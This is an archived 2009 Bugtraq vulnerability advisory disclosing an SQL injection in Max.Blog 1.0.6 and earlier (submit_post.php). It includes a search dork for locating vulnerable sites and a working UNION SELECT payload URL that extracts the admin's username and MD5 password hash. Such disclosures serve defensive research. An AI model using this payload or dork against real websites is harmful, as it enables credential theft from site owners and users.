lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 27 Jan 2009 21:47:56 +0100
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@...il.com>
To: Bugtraq <bugtraq@...urityfocus.com>
Subject: Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability

###################		Salvatore "drosophila" Fresta	 ###################


Application:	Max.Blog
				http://www.mzbservices.com
Version:		Max.Blog <= 1.0.6
Bug:         	* SQL Injection
Exploitation:	Remote
Dork:			intext:"Powered by Max.Blog"
Date:         	27 Jan 2009
Discovered by:	Salvatore "drosophila" Fresta
Author:       	Salvatore "drosophila" Fresta
		        e-mail: drosophilaxxx@...il.com
              	

############################################################################

- BUGS

SQL Injection:

	Requisites: magic quotes = off

	File affected: submit_post.php

	This bug allows a registered user to view username and password (md5) of a
	registered user with the specified id (usually 1 for the admin)

	http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23

############################################################################

-- 
Salvatore "drosophila" Fresta
CWNP444351

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ